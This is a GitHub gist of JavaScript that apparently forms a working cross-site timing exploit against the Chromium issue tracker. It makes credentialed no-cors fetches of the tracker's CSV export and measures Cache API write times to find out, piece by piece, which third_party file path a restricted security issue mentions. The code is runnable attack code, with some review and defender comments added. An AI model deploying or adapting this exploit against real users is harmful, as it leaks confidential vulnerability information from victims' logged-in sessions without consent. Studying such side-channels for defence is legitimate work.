@lbherrera lbherrera/exploit.js Secret
Created Nov 13, 2018
/**
 * Deletes every entry stored in the Cache API cache named 'cache'.
 *
 * Fire-and-forget: the function returns undefined and none of the
 * delete() promises are awaited or collected, so callers cannot tell
 * when the cache is actually empty.
 *
 * @returns {undefined}
 */
function clear_cache() {
  caches.open('cache').then((cache) => {
    cache.keys().then((keys) => {
      for (const storedRequest of keys) {
        cache.delete(storedRequest);
      }
    });
  });
}
/**
 * Splits an array into two halves at floor(length / 2).
 *
 * For odd lengths the first half is the shorter one; an empty array yields
 * two empty arrays and a single element ends up in the second half.
 *
 * @param {Array} array - the array to split (not mutated)
 * @returns {[Array, Array]} [firstHalf, secondHalf]
 */
function split_array(array) {
  const mid = Math.floor(array.length / 2);
  return [array.slice(0, mid), array.slice(mid)];
}
/**
 * Reports the recovered path once the single remaining candidate contains a
 * "." (the heuristic used here for "this is a file, not a directory").
 *
 * On a hit it logs the full path and the elapsed time since xplStart, raises
 * an alert with the path, and returns true. Otherwise it returns false and
 * produces no output.
 *
 * @param {string} leak - URL prefix prepended to the reported path
 * @param {string} optPath - path components confirmed so far
 * @param {string[]} hold - candidate list; only hold[0] is inspected
 * @param {number} xplStart - performance.now() timestamp of the run start
 * @returns {boolean} true when a result was reported
 */
function check_end(leak, optPath, hold, xplStart) {
  const [candidate] = hold;
  if (!candidate.includes(".")) {
    return false;
  }
  const fullPath = leak + optPath + candidate;
  console.log(fullPath);
  console.log(`Time to exfiltrate url: ${performance.now() - xplStart}`);
  alert(fullPath);
  return true;
}
/**
 * Runs one narrowing round of the timing probe against the issue tracker's
 * CSV export.
 *
 * Builds a search query from query1, fetches the export with the visitor's
 * cookies (credentials: "include", mode: "no-cors"), then repeatedly writes
 * the opaque response into the Cache API, timing each cache.put(). After 501
 * samples the mean write time is compared with the module-level `avg_time`
 * threshold to pick which candidate list to descend into; the function then
 * recurses with half of that list until one entry remains, which check_end()
 * reports.
 *
 * Reads module-level state: avg_time, leak, dirs, xplStart.
 *
 * NOTE(review): only query1 ever appears in the request URL; the else branch
 * narrows query2 without having queried it, so it appears to assume "no match
 * in query1 implies the match is in query2" — confirm that is intended.
 *
 * Defender note: the signal depends on a credentialed cross-site response being
 * fetchable in no-cors mode and storable via the Cache API. SameSite cookies
 * on the tracker session and a Cross-Origin-Resource-Policy header on the
 * export endpoint would cut off that fetch-and-store path.
 *
 * @param {string[]} query1 - candidate path components placed in the query
 * @param {string[]} query2 - the complementary candidate set
 * @param {string} optPath - path prefix confirmed so far (appended after /src/third_party/)
 * @returns {undefined} results are surfaced through console/alert in check_end()
 */
function exploit(query1, query2, optPath) {
  // Not awaited: the fetch below may race the cache clearing.
  clear_cache();
  // Each candidate becomes an OR'd, quoted path term pinned to a fixed issue id.
  var preparedQuery1 = "";
  var preparedQuery2 = "";
  for (var i = 0; i < query1.length; i++) {
    preparedQuery1 += ` OR id:770148 "/src/third_party/${ optPath }${ query1[i] }"`;
  }
  for (var i = 0; i < query2.length; i++) {
    preparedQuery2 += ` OR id:770148 "/src/third_party/${ optPath }${ query2[i] }"`;
  }
  // Strip the leading " OR " (4 characters) from each joined query.
  preparedQuery1 = preparedQuery1.substring(4);
  // NOTE(review): preparedQuery2 is built but never used in a URL below.
  preparedQuery2 = preparedQuery2.substring(4);
  var base = "https://bugs.chromium.org/p/chromium/issues/csv";
  // colspec is padded with 500 extra "+AllLabels" columns, making the URL very
  // long; the reason is not stated in this file.
  var params = `?can=1&q=${ preparedQuery1 }&colspec=AllLabels${ "+AllLabels".repeat(500) }`;
  var url = base + params;
  // Sample buffer of cache.put() durations (ms); fresh for every recursion.
  var times = [];
  caches.open('cache').then(function(cache) {
    // The response body is opaque to this origin (no-cors); only the time
    // taken to store it is measured below.
    fetch(url, {
      mode: "no-cors",
      credentials: "include"
    }).then(function(response) {
      // `request` actually holds the fetched Response (see the initial call below).
      function req(start, request) {
        // Distinct random key for every put() so entries accumulate in the cache.
        cache.put(new Request('foo' + Math.random()), request.clone()).then(function() {
          var end = performance.now();
          var time = end - start;
          times.push(time);
          // Decide once the 501st sample has arrived.
          if (times.length > 500) {
            clear_cache();
            // Drop the oldest sample before averaging.
            times.shift();
            var sum = times.reduce(function(a, b) { return a + b; });
            var avg = sum / times.length;
            // Mean put() time at or above the threshold selects query1; below it selects query2.
            if (avg >= avg_time) {
              // The filtered list is never read again: the recursion below
              // allocates a fresh `times`.
              times = times.filter(function(x) {
                return x < 2;
              });
              var query = split_array(query1);
              var hold = query[0].concat(query[1]);
              // One candidate left: report it if it is a file, else descend into it.
              // (Loose `==` here; strict equality would be the usual choice.)
              if (hold.length == 1) {
                if (check_end(leak, optPath, hold, xplStart)) return;
                // dirs (module level) lists children for only four prefixes; for
                // any other leaf this is undefined and split_array() throws on .length.
                var new_query = split_array(dirs[hold[0]]);
                var newPath = optPath + hold[0];
                return exploit(new_query[0], new_query[1], newPath);
              }
              console.log(query1);
              return exploit(query[0], query[1], optPath);
            } else {
              // Mirror of the branch above, narrowing query2 instead.
              var query = split_array(query2);
              var hold = query[0].concat(query[1]);
              if (hold.length == 1) {
                if (check_end(leak, optPath, hold, xplStart)) return;
                var new_query = split_array(dirs[hold[0]]);
                var newPath = optPath + hold[0];
                return exploit(new_query[0], new_query[1], newPath);
              }
              console.log(query2);
              return exploit(query[0], query[1], optPath);
            }
            // Unreachable: both branches above return.
            return;
          }
          // Take the next timed sample with a fresh start stamp.
          req(performance.now(), request);
        });
      }
      req(performance.now(), response);
    });
  });
}
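// Tunables and lookup tables read by exploit() and check_end() via closure.
// Fix: the "third_party/" listing was broken across two lines inside a string
// literal ("libvpx/","<newline>libwebm/"), which is a syntax error; the list is
// rejoined here and every statement is terminated.

// Threshold (ms) compared with the mean cache.put() duration in exploit().
const avg_time = 2;
// URL prefix prepended to the recovered path when check_end() reports it.
const leak = "https://cs.chromium.org/chromium/src/third_party/";
// Directory listing: path component -> its child entries. exploit() indexes
// dirs[candidate] once a single candidate remains, so only these four prefixes
// can be descended into; any other leaf yields undefined for split_array().
const dirs = {};
dirs["third_party/"] = [
  "Python-Markdown/", "SPIRV-Tools/", "WebKit/", "accessibility-audit/", "accessibility_test_framework/",
  "adobe/", "afl/", "analytics/", "android_async_task/", "android_crazy_linker/", "android_data_chart/",
  "android_deps/", "android_media/", "android_ndk/", "android_opengl/", "android_platform/",
  "android_protobuf/", "android_support_test_runner/", "android_swipe_refresh/", "android_system_sdk/",
  "android_tools/", "angle/", "apache-portable-runtime/", "apache-win32/", "apk-patch-size-estimator/",
  "apple_apsl/", "apple_sample_code/", "ashmem/", "auto/", "axe-core/", "bazel/", "bidichecker/",
  "binutils/", "bison/", "blanketjs/", "blink/", "boringssl/", "bouncycastle/", "breakpad/", "brotli/",
  "bspatch/", "byte_buddy/", "cacheinvalidation/", "catapult/", "ced/", "chaijs/", "checkstyle/",
  "chromite/", "cld_3/", "closure_compiler/", "colorama/", "crashpad/", "crc32c/", "cros_system_api/",
  "custom_tabs_client/", "d3/", "decklink/", "depot_tools/", "deqp/", "devscripts/",
  "devtools-node-modules/", "dom_distiller_js/", "elfutils/", "errorprone/", "espresso/", "eu-strip/",
  "expat/", "feed/", "ffmpeg/", "fips181/", "flac/", "flatbuffers/", "flot/", "fontconfig/", "freetype/",
  "gardiner_mod/", "gestures/", "gif_player/", "glslang/", "glslang-angle/", "gnu_binutils/",
  "google_appengine_cloudstorage/", "google_input_tools/", "google_toolbox_for_mac/", "googletest/",
  "gperf/", "gradle_wrapper/", "gson/", "guava/", "gvr-android-keyboard/", "gvr-android-sdk/", "haha/",
  "hamcrest/", "harfbuzz-ng/", "hunspell/", "hunspell_dictionaries/", "iaccessible2/", "iccjpeg/",
  "icu/", "icu4j/", "ijar/", "ink/", "inspector_protocol/", "instrumented_libraries/", "intellij/",
  "isimpledom/", "javax_inject/", "jinja2/", "jmake/", "jsoncpp/", "jsr-305/", "jstemplate/", "junit/",
  "khronos/", "lcov/", "leakcanary/", "leveldatabase/", "libFuzzer/", "libXNVCtrl/", "libaddressinput/",
  "libaom/", "libdrm/", "libevdev/", "libjingle_xmpp/", "libjpeg/", "libjpeg_turbo/", "liblouis/",
  "libovr/", "libphonenumber/", "libpng/", "libprotobuf-mutator/", "libsecret/", "libsrtp/", "libsync/",
  "libudev/", "libusb/", "libvpx/", "libwebm/", "libwebp/", "libxml/", "libxslt/", "libyuv/", "lighttpd/",
  "logilab/", "lss/", "lzma_sdk/", "mach_override/", "markdown/", "markupsafe/", "material_design_icons/",
  "mesa/", "metrics_proto/", "mingw-w64/", "minigbm/", "minizip/", "mocha/", "mockito/", "modp_b64/",
  "molokocacao/", "motemplate/", "mozilla/", "nacl_sdk_binaries/", "netty-tcnative/", "netty4/", "node/",
  "objenesis/", "ocmock/", "openh264/", "openmax_dl/", "openvr/", "opus/", "ots/", "ow2_asm/", "pdfium/",
  "pefile/", "perfetto/", "perl/", "pexpect/", "ply/", "polymer/", "proguard/", "protobuf/", "pycoverage/",
  "pyelftools/", "pyftpdlib/", "pylint/", "pymock/", "pystache/", "pywebsocket/", "qcms/", "qunit/",
  "re2/", "requests/", "rnnoise/", "robolectric/", "s2cellid/", "sfntly/", "shaderc/", "simplejson/",
  "sinonjs/", "skia/", "smhasher/", "snappy/", "speech-dispatcher/", "spirv-headers/",
  "spirv-tools-angle/", "sqlite/", "sqlite4java/", "sudden_motion_sensor/", "swiftshader/", "tcmalloc/",
  "test_fonts/", "tlslite/", "typ/", "ub-uiautomator/", "unrar/", "usb_ids/", "usrsctp/", "v4l-utils/",
  "visualmetrics/", "vulkan/", "vulkan-validation-layers/", "wayland/", "wayland-protocols/", "wds/",
  "web-animations-js/", "webdriver/", "webgl/", "webrtc/", "webrtc_overrides/", "widevine/",
  "win_build_output/", "woff2/", "wtl/", "xdg-utils/", "xstream/", "yara/", "yasm/", "zlib/",
];
dirs["pdfium/"] = [
  "build_overrides/", "core/", "docs/", "fpdfsdk/", "fxbarcode/", "fxjs/", "infra/", "public/",
  "samples/", "skia/", "testing/", "third_party/", "tools/", "xfa/",
];
dirs["fpdfsdk/"] = ["formfiller/", "fpdfxfa/", "pwl/"];
dirs["pwl/"] = [
  "README.md", "cpwl_appstream.cpp", "cpwl_appstream.h", "cpwl_button.cpp", "cpwl_button.h",
  "cpwl_caret.cpp", "cpwl_caret.h", "cpwl_combo_box.cpp", "cpwl_combo_box.h",
  "cpwl_combo_box_embeddertest.cpp", "cpwl_edit.cpp", "cpwl_edit.h", "cpwl_edit_ctrl.cpp",
  "cpwl_edit_ctrl.h", "cpwl_edit_embeddertest.cpp", "cpwl_edit_impl.cpp", "cpwl_edit_impl.h",
  "cpwl_font_map.cpp", "cpwl_font_map.h", "cpwl_icon.cpp", "cpwl_icon.h", "cpwl_list_box.cpp",
  "cpwl_list_box.h", "cpwl_list_impl.cpp", "cpwl_list_impl.h", "cpwl_scroll_bar.cpp",
  "cpwl_scroll_bar.h", "cpwl_special_button.cpp", "cpwl_special_button.h", "cpwl_timer.cpp",
  "cpwl_timer.h", "cpwl_timer_handler.cpp", "cpwl_timer_handler.h", "cpwl_wnd.cpp", "cpwl_wnd.h",
];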
// Entry point: start the first round over the top-level listing, recording the
// start time that check_end() uses for its elapsed-time report.
const third_party = split_array(dirs["third_party/"]);
const [firstHalf, secondHalf] = third_party;
var xplStart = performance.now(); // read by exploit() via closure
exploit(firstHalf, secondHalf, "");